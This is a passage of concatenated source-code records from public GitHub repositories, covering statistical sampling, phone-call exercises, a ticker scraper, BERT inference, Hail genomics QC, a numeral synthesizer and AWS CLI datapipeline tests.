Quality/Business Validation/Negative Ratings/negative_ratings.csv',\n                      index=False, sep=',', encoding='utf-8')\n\n\n","repo_name":"ryanelhamri/negative_ratings","sub_path":"new_ratings.py","file_name":"new_ratings.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"72018126655","text":"import math\nimport random as rnd\nimport matplotlib.pyplot as plt\n\n\ndef ravnomer(__a: float, __b: float, __R: float) -> float:\n    assert 0 <= __R <= 1\n    return __a + (__b - __a) * __R\n\n\ndef gauss(__mx: float, __sx: float, __RList: list) -> float:\n    for __R in __RList:\n        assert 0 <= __R <= 1\n    n = len(__RList)\n    return sum([x - n / float(2) for x in __RList]) * math.sqrt(12 / float(n)) * __sx + __mx\n\n\ndef exponential(__lambda: float, __R: float) -> float:\n    assert 0 <= __R <= 1\n    return (-1 / float(__lambda)) * math.log(__R)\n\n\ndef gamma(__lambda: float, __nu: float, __RList: list) -> float:\n    for __R in __RList:\n        assert 0 <= __R <= 1\n    return (-1 / float(__lambda)) * sum([math.log(x) for x in __RList])\n\n\ndef triangleMax(__a: float, __b: float, __R1: float, __R2: float) -> float:\n    assert 0 <= __R1 <= 1\n    assert 0 <= __R2 <= 1\n    return ravnomer(__a, __b, max(__R1, __R2))\n\n\ndef triangleMin(__a: float, __b: float, __R1: float, __R2: float) -> float:\n    assert 0 <= __R1 <= 1\n    assert 0 <= __R2 <= 1\n    return ravnomer(__a, __b, min(__R1, __R2))\n\n\ndef simpson(__a: float, __b: float, __R1: float, __R2: float):\n    assert 0 <= __R1 <= 1\n    assert 0 <= __R2 <= 1\n    return ravnomer(__a / float(2), __b / float(2), __R1) + ravnomer(__a / float(2), __b / float(2), __R2)\n\n\ndef getRandom():\n    return rnd.uniform(0, 1)\n\n\ndef ravnomer_TEST() -> list:\n    a = 1\n    b = 51\n    size = 1000000\n    return [ravnomer(a, b, getRandom()) for _ in range(0, size)]\n\n\ndef gauss_TEST() -> list:\n    mx = 25\n    sx = 15\n    n = 6\n    size = 1000000\n    return [gauss(mx, sx, [getRandom() for _ in range(0, n)]) for _ in range(0, size)]\n\n\ndef exponential_TEST() -> list:\n    lam = 13\n    size = 1000000\n    return [exponential(lam, getRandom()) for _ in range(0, size)]\n\n\ndef gamma_TEST() -> list:\n    lam = 13\n    nu = 14\n    n = 6\n    size = 1000000\n    return [gamma(lam, nu, [getRandom() for _ in range(0, n)]) for _ in range(0, size)]\n\n\ndef triangleMax_TEST() -> list:\n    a = 1\n    b = 51\n    size = 1000000\n    return [triangleMax(a, b, getRandom(), getRandom()) for _ in range(0, size)]\n\n\ndef triangleMin_TEST() -> list:\n    a = 1\n    b = 51\n    size = 1000000\n    return [triangleMin(a, b, getRandom(), getRandom()) for _ in range(0, size)]\n\n\ndef simpson_TEST() -> list:\n    a = 1\n    b = 51\n    size = 1000000\n    return [simpson(a, b, getRandom(), getRandom()) for _ in range(0, size)]\n\n\ndef showHist(__res: list, __output: str):\n    offset = min(__res)\n    step = (max(__res) - offset)/float(20)\n    plt.hist(__res, bins=[i * step + offset for i in range(0, 21)])\n    plt.savefig(__output)\n    plt.show()\n\nif __name__ == \"__main__\":\n    showHist(ravnomer_TEST(), \"ravnomer.png\")\n    showHist(gauss_TEST(), \"gauss.png\")\n    showHist(exponential_TEST(), \"exponential.png\")\n    showHist(gamma_TEST(), \"gamma.png\")\n    showHist(triangleMax_TEST(), \"triangleMax.png\")\n    showHist(triangleMin_TEST(), \"triangleMin.png\")\n    showHist(simpson_TEST(), \"simpson.png\")","repo_name":"FyodorovAleksej/MOD2","sub_path":"generatorDetermine.py","file_name":"generatorDetermine.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"26738263221","text":"\"\"\"\nRead file into texts and calls.\nIt's ok if you don't understand how to read files.\n\"\"\"\nimport csv\n\nwith open('texts.csv', 'r') as f:\n    reader = csv.reader(f)\n    texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n    reader = csv.reader(f)\n    calls = list(reader)\n\n# Define a function for getting fixed-line numbers\ndef get_fixed_code(phonenumber):\n    close_parenthesis = phonenumber.find(\")\")\n    if(close_parenthesis != -1):\n        return phonenumber[:(close_parenthesis+1)]\n\n# Define a function for getting cellphone numbers\ndef get_cellphone_code(phonenumber):\n    if(phonenumber.startswith('7') or phonenumber.startswith('8') or phonenumber.startswith('9')):\n        return phonenumber[:4]\n\n\n\n# Define a function for getting Bangalore's numbers\ndef get_bangalore_numbers(list_numbers):\n    bangalore_codes = []\n    total_calls = 0\n    bangalore_fixed_calls = 0\n    flag = True\n    for number in list_numbers:\n        if number[0].startswith(\"(080)\"):\n            if number[1].startswith(\"(0\"):\n                fix_code = get_fixed_code(number[1])\n                if not fix_code in bangalore_codes:\n                    bangalore_codes.append(fix_code)\n            if(number[1].find(\" \") != -1):\n                fix_code = get_cellphone_code(number[1])\n                if not fix_code in bangalore_codes:\n                    bangalore_codes.append(fix_code)\n            if(number[1].startswith(\"140\") and flag):\n                bangalore_codes.append(\"140\")\n                flag = False\n        if number[0].startswith(\"(080)\"):\n            total_calls = total_calls + 1\n        if number[0].startswith(\"(080)\") and number[1].startswith(\"(080)\"):\n            bangalore_fixed_calls = bangalore_fixed_calls + 1\n    bangalore_codes.sort()\n    percentage = (bangalore_fixed_calls / total_calls) * 100\n    return bangalore_codes, percentage\n\ndef print_list(list_numbers):\n    for number in list_numbers:\n        print(number)\n\nprint(\"The numbers called by people in Bangalore have codes:\")\nresult = get_bangalore_numbers(calls)\nprint_list(result[0])\n\nprint(\"{:.2f} percent of calls from fixed lines in Bangalore are calls to other fixed lines in Bangalore.\".format(result[1]))\n\"\"\"\nTASK 3:\n(080) is the area code for fixed line telephones in Bangalore.\nFixed line numbers include parentheses, so Bangalore numbers\nhave the form (080)xxxxxxx.)\n\nPart A: Find all of the area codes and mobile prefixes called by people\nin Bangalore.\n - Fixed lines start with an area code enclosed in brackets. The area\n   codes vary in length but always begin with 0.\n - Mobile numbers have no parentheses, but have a space in the middle\n   of the number to help readability. The prefix of a mobile number\n   is its first four digits, and they always start with 7, 8 or 9.\n - Telemarketers' numbers have no parentheses or space, but they start\n   with the area code 140.\n\nPrint the answer as part of a message:\n\"The numbers called by people in Bangalore have codes:\"\n\nThe list of codes should be printed out one per line in lexicographic order with no duplicates.\n\nPart B: What percentage of calls from fixed lines in Bangalore are made\nto fixed lines also in Bangalore? In other words, of all the calls made\nfrom a number starting with \"(080)\", what percentage of these calls\nwere made to a number also starting with \"(080)\"?\n\nPrint the answer as a part of a message::\n\" percent of calls from fixed lines in Bangalore are calls\nto other fixed lines in Bangalore.\"\nThe percentage should have 2 decimal digits\n\"\"\"\n\n\"\"\"\nBig O' Notation:\nNotation O(N^2)\n\"\"\"","repo_name":"AugustoAleGon/algoritm-datastructure-p1","sub_path":"Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"40243809100","text":"import time\nfrom datetime import datetime\n\nimport pandas as pd\nfrom tqdm import tqdm\n\nimport yticker\n\n\ndef main():\n    ylb = yticker.YahooLookupBrowser()\n    answers = set()\n\n    perpage = 10000\n    idx = 0\n    letters = list('abcdefghijklmnopqrstuvwxyz')\n    queue = list(letters)\n    pbar = tqdm(total=len(queue))\n\n    while idx < len(queue):\n        pbar.set_description(f\"[query = {queue[idx]}]\")\n        pbar.refresh()\n\n        try:\n            t = datetime.now()\n            ans, total = ylb.lookup(key=queue[idx], category='all', start=0, size=perpage)\n            seconds = (datetime.now() - t).total_seconds()\n            pbar.write(f\"query = {queue[idx]} | count = {len(ans)} | total = {total} | seconds = {seconds}\")\n        except Exception as e:\n            pbar.write(f\"error (idx = {idx}, query = {queue[idx]}): \" + str(e))\n            pbar.write(\"wait for 10 seconds...\")\n            time.sleep(10)  # s\n            continue\n\n        if total > perpage:\n            add = [queue[idx] + '%20' + letter for letter in letters] + [queue[idx] + letter for letter in letters]\n            queue += add\n            pbar.write(f\"Add new queries {queue[idx]}[%20][a-z] to queue\")\n            pbar.reset(total=len(queue))\n            pbar.update(n=idx)\n\n        answers.update(ans)\n        pbar.update()\n        idx += 1\n\n    answer_list = sorted(list(answers))\n    df = pd.DataFrame(answer_list)\n    df.to_csv('answers.csv')\n\n\nif __name__ == \"__main__\":\n    t_start = datetime.now()\n    main()\n    print(datetime.now() - t_start)\n","repo_name":"wood-run/yticker","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"73115815296","text":"#!/usr/bin/env python\n\n__author__ = \"Abhinav Sarkar\"\n__version__ = \"0.2\"\n__license__ = \"GNU Lesser General Public License\"\n__package__ = \"lastfm\"\n\nfrom lastfm.mixin import mixin\n\n@mixin(\"property_adder\")\nclass Wiki(object):\n    \"\"\"A class representing the information from the wiki of the subject.\"\"\"\n\n    class Meta(object):\n        properties = [\"subject\", \"published\", \"summary\", \"content\"]\n\n    def __init__(self,\n                 subject,\n                 published = None,\n                 summary = None,\n                 content = None):\n        self._subject = subject\n        self._published = published\n        self._summary = summary\n        self._content = content\n\n    def __repr__(self):\n        # NOTE: the original format string was stripped from this copy; plausible reconstruction:\n        return \"<lastfm.Wiki: %s %s>\" % (self.subject.__class__.__name__, self.subject.name)","repo_name":"jc/python-lastfm","sub_path":"lastfm/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"79"}
+{"seq_id":"74158798976","text":"# -*- coding: UTF-8 -*-\n\nimport os\nimport sys\nimport codecs\nimport xml.etree.ElementTree as ET\n#############################################\nrpc_req_id = 'RPC_%(module)s_%(msg_name)s_REQ'\nrpc_notify_id = 'RPC_%(module)s_%(msg_name)s_NOTIFY'\n#############################################\n\nclass GenCsharp(object):\n    def __init__(self, root, module):\n        self.root = root\n        self.module = module\n        self.enum_fields = \"\"\n        self.module_id = 0\n        pass\n\n    def write_csharp(self):\n        if not self.parse_xml():\n            return\n        proto_enum = '''\nenum E%(module)s\n{\n    MODULE_ID_%(module_upper)s = %(module_id)s,\n    %(enum_fields)s\n}\n''' \n        proto_enum = proto_enum % {\n            \"module\": self.module,\n            \"module_upper\": self.module.upper(),\n            \"module_id\": self.module_id,\n            \"enum_fields\": self.enum_fields,\n        }\n        return proto_enum\n\n    def parse_xml(self):\n        self.module_id = self.root.attrib['id']\n        if self.root.findall('Message/PublicMsg'):\n            return False\n        for req_reply in self.root.findall(\"Message/ReqReplyMsg\"):\n            msg_id = req_reply.attrib[\"id\"]\n            msg_name = req_reply.attrib[\"name\"]\n            id_field = rpc_req_id % {\"module\": self.module, \"msg_name\": msg_name}\n            id_field = id_field.upper()\n            enum_field = id_field + \" = \"+msg_id+\",\\n\\t\\t\"\n            self.enum_fields += enum_field\n\n        for notify in self.root.findall(\"Message/NotifyMsg/Notify\"):\n            msg_id = notify.attrib[\"id\"]\n            msg_name = notify.attrib[\"name\"]\n            id_field = rpc_notify_id % {\"module\": self.module, \"msg_name\": msg_name}\n            id_field = id_field.upper()\n            enum_field = id_field + \" = \"+msg_id+\",\\n\\t\\t\"\n            self.enum_fields += enum_field\n\n        self.enum_fields = self.enum_fields[:-3]\n        return True\n","repo_name":"aywfelix/ProtoTool","sub_path":"Program/gen_csharp.py","file_name":"gen_csharp.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"41250258986","text":"from models.text_classifier import BertClassifier\nfrom transformers import BertTokenizer\nimport torch\nimport torch.nn as nn\n\ndef infer(sentence):\n\n    ## RECOMMENDED TO EXPLICITLY SET IT AS AN ABSOLUTE PATH.\n    pt_path = \"/content/CS492FinalProject/TER/bert-best.pth\"\n\n    emos = ['joy', 'sadness', 'fear', 'anger', 'neutral']\n    device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n    tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)\n\n    encoded_dict = tokenizer.encode_plus(\n        sentence, \n        add_special_tokens = True, \n        max_length = 140, \n        pad_to_max_length = True,\n        return_attention_mask = True, \n        return_tensors = 'pt',\n    )\n\n    input_id = encoded_dict['input_ids'].to(device)\n    attention_mask = encoded_dict['attention_mask'].to(device)\n\n    model = BertClassifier(num_labels=5).to(device)\n\n    model.load_state_dict(torch.load(pt_path)[\"model\"])\n    output = model(input_id, attention_mask)\n\n    pred = torch.max(output, dim=1)[1]\n\n    return {\"text\": sentence, \"emotion\": emos[pred]}","repo_name":"yegonkim/CS492FinalProject","sub_path":"TER/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"}
+{"seq_id":"40069225408","text":"## for ECE479 ICC Lab2 Part3\n\n'''\n*Main Student Script*\n'''\n\n# Your work starts here\n\n# Import packages you need here\nfrom inception_resnet import InceptionResNetV1Norm\nimport numpy as np\nimport tensorflow as tf\n\n# Create a model\nmodel = InceptionResNetV1Norm()\n\n# Verify the model and load the weights into the net\nprint(model.summary())\nprint(len(model.layers))\nmodel.load_weights(\"./weights/inception_keras_weights.h5\") # Has been translated from checkpoint\nmodel.save(\"google_net\")\nconverter = tf.lite.TFLiteConverter.from_saved_model(\"/Users/lorenzo/Documents/UIUC/Y2-S2/ECE479/lab2_sp23/code/google_net\")\ntflite_model = converter.convert()\nopen(\"google_net.tflite\",\"wb\").write(tflite_model)","repo_name":"LoganCudia411/ECE479_code","sub_path":"lab2/code/lab2_part3.py","file_name":"lab2_part3.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"34565993748","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2019-12-11\n@author: duytinvo\n\"\"\"\nimport math\nimport torch\nimport numpy as np\nimport torch.nn as nn\n\n\nclass Emb_layer(nn.Module):\n    \"\"\"\n    This module takes (characters or words) indices as inputs and outputs (characters or words) embeddings\n    \"\"\"\n\n    def __init__(self, HPs):\n        super(Emb_layer, self).__init__()\n        [size, dim, pre_embs, drop_rate, zero_padding, requires_grad] = HPs\n        self.zero_padding = zero_padding\n        self.embeddings = nn.Embedding(size, dim, padding_idx=0)\n        if pre_embs is not None:\n            self.embeddings.weight.data.copy_(torch.from_numpy(pre_embs))\n        else:\n            self.embeddings.weight.data.copy_(torch.from_numpy(self.random_embedding(size, dim)))\n        if not requires_grad:\n            print(\"Fixed pre-trained embeddings\")\n            self.embeddings.weight.requires_grad = requires_grad\n        self.drop = nn.Dropout(drop_rate)\n\n    def forward(self, inputs, auxiliary_embs=None):\n        return self.get_embs(inputs, auxiliary_embs)\n\n    def get_embs(self, inputs, auxiliary_embs=None):\n        \"\"\"\n        embs.shape([0, 1]) == auxiliary_embs.shape([0, 1])\n        \"\"\"\n        if self.zero_padding:\n            # set zero vector for padding, unk, eot, sot\n            self.set_zeros([0, 1, 2, 3])\n        # embs = tensor(batch_size, seq_length, input_dim)\n        embs = self.embeddings(inputs)\n        embs_drop = self.drop(embs)\n        if auxiliary_embs is not None:\n            assert embs_drop.shape[:-1] == auxiliary_embs.shape[:-1]\n            embs_drop = torch.cat((embs_drop, auxiliary_embs), -1)\n        return embs_drop\n\n    def random_embedding(self, size, dim):\n        pre_embs = np.empty([size, dim])\n        scale = np.sqrt(3.0 / dim)\n        for index in range(size):\n            pre_embs[index, :] = np.random.uniform(-scale, scale, [1, dim])\n        return pre_embs\n\n    def set_zeros(self, idx):\n        for i in idx:\n            self.embeddings.weight.data[i].fill_(0)\n\n\nclass PositionalEncoding(nn.Module):\n    def __init__(self, HPs):\n        super(PositionalEncoding, self).__init__()\n        [size, dim, pre_embs, drop_rate, zero_padding, requires_grad, max_len] = HPs\n        HPs[3] = 0.0\n\n        self.wordemb_layer = Emb_layer(HPs[:-1])\n        self.dropout = nn.Dropout(p=drop_rate)\n\n        pe = torch.zeros(max_len, dim)\n        position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n        div_term = torch.exp(torch.arange(0, dim, 2).float() * (-math.log(10000.0) / dim))\n        pe[:, 0::2] = torch.sin(position * div_term)\n        pe[:, 1::2] = torch.cos(position * div_term)\n        pe = pe.unsqueeze(0)\n        self.register_buffer('pe', pe)\n\n    def forward(self, inputs, auxiliary_embs=None):\n        \"\"\"\n        :param inputs: word tensors in (batch, length)\n        :return: wordpos embs in (batch, length, size)\n        \"\"\"\n        x = self.wordemb_layer(inputs, auxiliary_embs)\n        x = x + self.pe[:, :x.size(1), :]\n        return self.dropout(x)\n\n\nif __name__ == '__main__':\n    word_HPs = [30000, 512, None, 0.0, False, True]  # [size, dim, pre_embs, drop_rate, zero_padding, requires_grad]\n    wordemb_layer = Emb_layer(word_HPs)\n\n    # pos_HPs = [512, 0.1, 5000]  # [d_model, dropout, max_len]\n    max_len = 5000\n    posemb_layer = PositionalEncoding(word_HPs + [max_len])\n\n    x = torch.randint(1000, (50, 32)).to(dtype=torch.long)\n    wordemb = wordemb_layer(x)\n    wordposemb = posemb_layer(x)\n","repo_name":"duytinvo/MLlib","sub_path":"mlmodels/modules/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"}
+{"seq_id":"23533160570","text":"import os\nfrom os.path import dirname, join\n\nTMP_DIR = join(dirname(__file__), \"tmp\")\nROOT = dirname(dirname(__file__))\nCONFIG_FILE = join(TMP_DIR, \"config.json\")\nCACHE_DIR = join(TMP_DIR, \"cache\")\nSRC_DIR = join(TMP_DIR, \"src\")\nDEST_DIR = join(TMP_DIR, \"dest\")\nREMOTE = \"test\"\n\nos.environ.setdefault(\"LIDLESS_USER_DIR\", TMP_DIR)\nfrom lidless import Config\n\n\nclass BaseAll:\n    \"\"\"\n    Base class for all tests.\n    \"\"\"\n\n    def setup_method(self):\n        self.roots = {}\n        self.targets = {}\n        self.settings = {}\n        self.default_dest = DEST_DIR\n\n    def create_target(self, **kwargs):\n        target = {\"tool\": \"rsync\", \"maps\": {SRC_DIR: DEST_DIR}}\n        target.update(kwargs)\n        return target\n\n    def create_root(self, path):\n        return join(SRC_DIR, path)\n\n    def get_config(self):\n        data = {\n            \"roots\": self.roots,\n            \"settings\": self.settings,\n            \"targets\": self.targets,\n        }\n        return Config(user_dir=TMP_DIR, data=data)\n\n    def get_target(self, key):\n        return self.get_config().get_target(key)\n\n    def get_nodes(self, key):\n        return self.get_target(key).nodes\n","repo_name":"slickworks/lidless","sub_path":"tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"21671112813","text":"general_arguments = [\n    'seed',\n    'reproducibility',\n    'state',\n    'model',\n    'data_path',\n    'checkpoint_dir',\n    'show_progress',\n    'config_file',\n    'log_wandb',\n    'use_modality'\n]\n\ntraining_arguments = [\n    'epochs', 'train_batch_size',\n    'optim_args',\n    'eval_step', 'stopping_step',\n    'clip_grad_norm',\n    'loss_decimal_place',\n]\n\nevaluation_arguments = [\n    'eval_type',\n    'repeatable',\n    'metrics', 'topk', 'valid_metric', 'valid_metric_bigger',\n    'eval_batch_size',\n    'metric_decimal_place',\n]\n\ndataset_arguments = [\n    'MAX_ITEM_LIST_LENGTH'\n]\n\n\n\n\n\n","repo_name":"westlake-repl/PixelRec","sub_path":"code/REC/utils/argument_list.py","file_name":"argument_list.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"79"}
+{"seq_id":"16064179033","text":"\n'''\nQC for WGS\nauthor: Pavlos Antoniou\ndate: 22/07/19\n'''\n\nimport os\nimport hail as hl\nimport sys\nimport json\n\n\nCHROMOSOMES = [\"chr2\",\n               \"chr3\",\n               \"chr4\",\n               \"chr5\",\n               \"chr6\",\n               \"chr7\",\n               \"chr8\",\n               \"chr9\",\n               \"chr10\",\n               \"chr11\",\n               \"chr12\",\n               \"chr13\",\n               \"chr14\",\n               \"chr15\",\n               \"chr16\",\n               \"chr17\",\n               \"chr18\",\n               \"chr19\",\n               \"chr20\",\n               \"chr21\",\n               \"chr22\",\n               \"chrX\",\n               \"chrY\"\n               ]\n\n\n\nBUCKET = \"gs://interval-wgs\"\n# Define chromosome here\ntmp_dir = \"/Users/pa10/Programming/google-code/google/tmp\"\n\nif __name__ == \"__main__\":\n    # need to create spark cluster first before initialising hail\n    # Define the hail persistent storage directory\n    hl.init(default_reference=\"GRCh38\", tmp_dir=tmp_dir)\n\n\n    mt_chr1 = hl.read_matrix_table(f\"{BUCKET}/matrixtables/chr1/chr1-full-sampleqc-variantqc-filtered-FINAL.mt\")\n\n    for CHROMOSOME in CHROMOSOMES:\n        mt = hl.read_matrix_table(f\"{BUCKET}/matrixtables/{CHROMOSOME}/{CHROMOSOME}-full-sampleqc-variantqc-filtered-FINAL.mt\")\n        mt_chr1 = mt_chr1.union_rows(mt)\n\n\n    CHROMOSOME = \"WGS\"\n    fields_to_drop = ['variant_QC_Hail', 'sample_QC_Hail']\n\n    mt1 = mt_chr1.drop(*fields_to_drop)\n\n    mt2 = hl.sample_qc(mt1, name='sample_QC_Hail')\n    mt3 = hl.variant_qc(mt2, name='variant_QC_Hail')\n\n    mt3 = mt3.checkpoint(\n        f\"{BUCKET}/matrixtables/{CHROMOSOME}/{CHROMOSOME}-full-sampleqc-variantqc-filtered-FINAL.mt\", overwrite=True)\n    mt3_cols = mt3.cols()\n    mt3_cols.flatten().export(\n        f\"{BUCKET}/output-tables/{CHROMOSOME}/{CHROMOSOME}-sampleQC_filtered_FINAL.tsv.bgz\", header=True)\n\n    mt3_rows = mt3.rows()\n    mt3_rows.select(mt3_rows.variant_QC_Hail).flatten().export(\n        f\"{BUCKET}/output-tables/{CHROMOSOME}/{CHROMOSOME}-variantQC_filtered_FINAL.tsv.bgz\", header=True)\n\n","repo_name":"wtsi-hgi/hail_analysis_pipelines","sub_path":"WGS_QC/custom_annotation_scripts/exporting_table_QC.py","file_name":"exporting_table_QC.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"28583608503","text":"from collections import deque\nfrom typing import Optional\n\n# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\nclass Solution:\n    def largestValues(self, root: Optional[TreeNode]) -> list[int]:\n        ans = []\n        if root:\n            que = deque()\n            que.append(root)\n            while que:\n                max_of_level = que[0].val\n                size = len(que)\n                for _ in range(size):\n                    p = que.popleft()\n                    max_of_level = max(max_of_level, p.val)\n                    if p.left:\n                        que.append(p.left)\n                    if p.right:\n                        que.append(p.right)\n                ans.append(max_of_level)\n        return ans","repo_name":"zcPasser/leetcode_python","sub_path":"code_capriccio/binary_tree/lc515_find-largest-value-in-each-tree-row.py","file_name":"lc515_find-largest-value-in-each-tree-row.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
generate_year_bitext(args.start, args.end)\nif args.samples and len(bitexts) > args.samples:\n bitexts = random.sample(bitexts, args.samples)\n\nmandarins = list(map(itemgetter(0), bitexts))\ntaibuns = list(map(lambda taibun: \" \".join(taibun), map(itemgetter(1), bitexts)))\nwrite_lines_to_file(f\"{args.prefix}.mandarin.txt\", mandarins)\nwrite_lines_to_file(f\"{args.prefix}.taibun.txt\", taibuns)\n","repo_name":"Chung-I/mandarin_to_tsm","sub_path":"synthesize_numerals.py","file_name":"synthesize_numerals.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"16003479281","text":"import copy\nimport unittest\n\nfrom awscli.testutils import mock, BaseAWSHelpOutputTest, BaseAWSCommandParamsTest\n\nfrom awscli.customizations.datapipeline import convert_described_objects\nfrom awscli.customizations.datapipeline import ListRunsCommand\n\n\nAPI_DESCRIBE_OBJECTS = [\n {\"fields\": [\n {\n \"key\": \"@componentParent\",\n \"refValue\": \"S3Input\"\n },\n {\n \"key\": \"@scheduledStartTime\",\n \"stringValue\": \"2013-08-19T20:00:00\"\n },\n {\n \"key\": \"parent\",\n \"refValue\": \"S3Input\"\n },\n {\n \"key\": \"@sphere\",\n \"stringValue\": \"INSTANCE\"\n },\n {\n \"key\": \"type\",\n \"stringValue\": \"S3DataNode\"\n },\n {\n \"key\": \"@version\",\n \"stringValue\": \"1\"\n },\n {\n \"key\": \"@status\",\n \"stringValue\": \"FINISHED\"\n },\n {\n \"key\": \"@actualEndTime\",\n \"stringValue\": \"2014-02-19T19:44:44\"\n },\n {\n \"key\": \"@actualStartTime\",\n \"stringValue\": \"2014-02-19T19:44:43\"\n },\n {\n \"key\": \"output\",\n \"refValue\": \"@MyCopyActivity_2013-08-19T20:00:00\"\n },\n {\n \"key\": \"@scheduledEndTime\",\n \"stringValue\": \"2013-08-19T21:00:00\"\n }\n ],\n \"id\": \"@S3Input_2013-08-19T20:00:00\",\n \"name\": \"@S3Input_2013-08-19T20:00:00\"\n },\n {\"fields\": [\n {\n \"key\": \"@componentParent\",\n \"refValue\": \"MyEC2Resource\"\n },\n {\n \"key\": \"@resourceId\",\n \"stringValue\": \"i-12345\"\n },\n {\n \"key\": \"@scheduledStartTime\",\n \"stringValue\": \"2013-08-19T23:00:00\"\n },\n {\n \"key\": \"parent\",\n \"refValue\": \"MyEC2Resource\"\n },\n {\n \"key\": \"@sphere\",\n \"stringValue\": \"INSTANCE\"\n },\n {\n \"key\": \"@attemptCount\",\n \"stringValue\": \"1\"\n },\n {\n \"key\": \"type\",\n \"stringValue\": \"Ec2Resource\"\n },\n {\n \"key\": \"@version\",\n \"stringValue\": \"1\"\n },\n {\n \"key\": \"@status\",\n \"stringValue\": \"CREATING\"\n },\n {\n \"key\": \"input\",\n \"refValue\": \"@MyCopyActivity_2013-08-19T23:00:00\"\n },\n {\n \"key\": \"@triesLeft\",\n \"stringValue\": \"2\"\n },\n {\n \"key\": \"@actualStartTime\",\n \"stringValue\": \"2014-02-19T19:59:45\"\n },\n {\n \"key\": \"@headAttempt\",\n \"refValue\": \"@MyEC2Resource_2013-08-19T23:00:00_Attempt=1\"\n },\n {\n \"key\": \"@scheduledEndTime\",\n \"stringValue\": \"2013-08-20T00:00:00\"\n }\n ],\n \"id\": \"@MyEC2Resource_2013-08-19T23:00:00\",\n \"name\": \"@MyEC2Resource_2013-08-19T23:00:00\"\n }\n]\n\nJSON_FORMATTER_PATH = 'awscli.formatter.JSONFormatter.__call__'\nLIST_FORMATTER_PATH = 'awscli.customizations.datapipeline.listrunsformatter.ListRunsFormatter.__call__' # noqa\n\n\nclass TestConvertObjects(unittest.TestCase):\n\n def test_convert_described_objects(self):\n converted = convert_described_objects(API_DESCRIBE_OBJECTS)\n self.assertEqual(len(converted), 2)\n # This comes from a \"refValue\" value.\n self.assertEqual(converted[0]['@componentParent'], 'S3Input')\n # 
Should also merge in @id and name.\n self.assertEqual(converted[0]['@id'], \"@S3Input_2013-08-19T20:00:00\")\n self.assertEqual(converted[0]['name'], \"@S3Input_2013-08-19T20:00:00\")\n # This comes from a \"stringValue\" value.\n self.assertEqual(converted[0]['@sphere'], \"INSTANCE\")\n\n def test_convert_objects_are_sorted(self):\n describe_objects = copy.deepcopy(API_DESCRIBE_OBJECTS)\n # Change the existing @scheduledStartTime from\n # 20:00:00 to 23:59:00\n describe_objects[0]['fields'][1]['stringValue'] = (\n \"2013-08-19T23:59:00\")\n converted = convert_described_objects(\n describe_objects,\n sort_key_func=lambda x: (x['@scheduledStartTime'], x['name']))\n self.assertEqual(converted[0]['@scheduledStartTime'],\n '2013-08-19T23:00:00')\n self.assertEqual(converted[1]['@scheduledStartTime'],\n '2013-08-19T23:59:00')\n\n\nclass FakeParsedArgs(object):\n def __init__(self, **kwargs):\n self.endpoint_url = None\n self.region = None\n self.verify_ssl = None\n self.output = None\n self.query = None\n self.__dict__.update(kwargs)\n\n\nclass TestCommandsRunProperly(BaseAWSCommandParamsTest):\n def setUp(self):\n super(TestCommandsRunProperly, self).setUp()\n self.query_objects = mock.Mock()\n self.describe_objects = mock.Mock()\n self.client = mock.Mock()\n self.client.get_paginator.return_value = self.query_objects\n self.client.describe_objects = self.describe_objects\n\n self.driver.session = mock.Mock()\n self.driver.session.emit_first_non_none_response.return_value = None\n self.driver.session.create_client.return_value = self.client\n self.query_objects.paginate.return_value.build_full_result.\\\n return_value = {'ids': ['object-ids']}\n self.describe_objects.return_value = \\\n {'pipelineObjects': API_DESCRIBE_OBJECTS}\n self.expected_response = convert_described_objects(\n API_DESCRIBE_OBJECTS,\n sort_key_func=lambda x: (x['@scheduledStartTime'], x['name']))\n\n def test_list_runs(self):\n command = ListRunsCommand(self.driver.session)\n command(['--pipeline-id', 'my-pipeline-id'],\n parsed_globals=FakeParsedArgs(region='us-east-1'))\n self.assertTrue(self.query_objects.paginate.called)\n self.describe_objects.assert_called_with(\n pipelineId='my-pipeline-id', objectIds=['object-ids'])\n\n @mock.patch(JSON_FORMATTER_PATH)\n @mock.patch(LIST_FORMATTER_PATH)\n def 